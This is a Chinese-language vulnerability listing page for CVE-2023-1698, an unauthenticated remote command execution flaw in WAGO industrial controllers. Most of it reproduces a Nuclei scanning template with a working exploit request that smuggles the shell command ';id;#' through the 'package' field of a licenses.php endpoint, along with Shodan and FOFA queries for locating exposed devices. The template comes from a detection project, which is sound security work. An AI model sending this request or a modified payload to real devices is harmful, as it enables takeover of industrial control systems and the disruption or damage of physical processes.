CVE-2023-1698: WAGO - Remote Command Execution

日期: 2025-08-01 | 影响软件: WAGO | POC: 已公开

漏洞描述

In multiple products of WAGO, a vulnerability allows an unauthenticated, remote attacker to create new users and change the device configuration which can result in unintended behavior, Denial of Service, and full system compromise.

PoC代码[已公开]

id: CVE-2023-1698

info:
  name: WAGO - Remote Command Execution
  author: xianke
  severity: critical
  description: |
    In multiple products of WAGO, a vulnerability allows an unauthenticated, remote attacker to create new users and change the device configuration which can result in unintended behavior, Denial of Service, and full system compromise.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the target system.
  remediation: |
    Apply the latest security patches and updates provided by the vendor to mitigate this vulnerability.
  reference:
    - https://onekey.com/blog/security-advisory-wago-unauthenticated-remote-command-execution/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-1698
    - https://cert.vde.com/en/advisories/VDE-2023-007/
    - https://github.com/codeb0ss/CVE-2023-1698-PoC
    - https://github.com/deIndra/CVE-2023-1698
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-1698
    cwe-id: CWE-78
    epss-score: 0.9376
    epss-percentile: 0.99853
    cpe: cpe:2.3:o:wago:compact_controller_100_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: wago
    product: compact_controller_100_firmware
    shodan-query:
      - html:"/wbm/" html:"wago"
      - http.html:"/wbm/" html:"wago"
    fofa-query: body="/wbm/" html:"wago"
  tags: cve2023,cve,wago,rce

http:
  - raw:
      - |
        POST /wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        {"package":";id;#"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"license":'
          - '"name":'
          - 'uid='
          - 'gid='
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210091eae1a57050c3fa0c094fae0093c743e91491bd298f59ec6f9576ffcfec6072022100d457ebfab88e9668476f57e77a2fcd3929f7315b7eb79a54bdd57063120602b5:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-1698.yaml

相关漏洞推荐